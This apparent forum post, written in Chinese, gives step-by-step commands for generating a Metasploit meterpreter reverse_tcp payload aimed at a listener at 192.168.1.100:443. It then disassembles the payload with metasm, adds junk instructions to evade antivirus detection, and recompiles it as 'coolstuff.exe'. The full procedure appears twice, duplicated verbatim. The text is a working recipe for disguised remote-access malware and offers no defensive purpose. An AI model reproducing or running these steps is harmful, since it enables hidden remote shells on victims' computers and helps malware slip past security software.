技术本质还是花指令,本文的目的是使用metasploit框架来生成raw payload,反汇编payload,使用花指令,然后重新编译成二进制可执行文件
1. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443 R > raw_binary
2.拷贝metasm.rb文件和metasm文件夹到ruby的安装目录
cp /usr/share/metasploit-framework/lib/metasm.rb /usr/local/lib/site_ruby/1.9.1/
cp -r /usr/share/metasploit-framework/lib/metasm /usr/local/lib/site_ruby/1.9.1/
3. ruby /usr/share/metasploit-framework/lib/metasm/samples/disassemble.rb raw_binary > test.asm
4.编辑花指令。[color=blue]关键一点,栈平衡[/color]
5. ruby /usr/local/lib/site_ruby/1.9.1/metasm/samples/peencode.rb test.asm -o coolstuff.exe
1. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443 R > raw_binary
2.拷贝metasm.rb文件和metasm文件夹到ruby的安装目录
cp /usr/share/metasploit-framework/lib/metasm.rb /usr/local/lib/site_ruby/1.9.1/
cp -r /usr/share/metasploit-framework/lib/metasm /usr/local/lib/site_ruby/1.9.1/
3. ruby /usr/share/metasploit-framework/lib/metasm/samples/disassemble.rb raw_binary > test.asm
4.编辑花指令。[color=blue]关键一点,栈平衡[/color]
5. ruby /usr/local/lib/site_ruby/1.9.1/metasm/samples/peencode.rb test.asm -o coolstuff.exe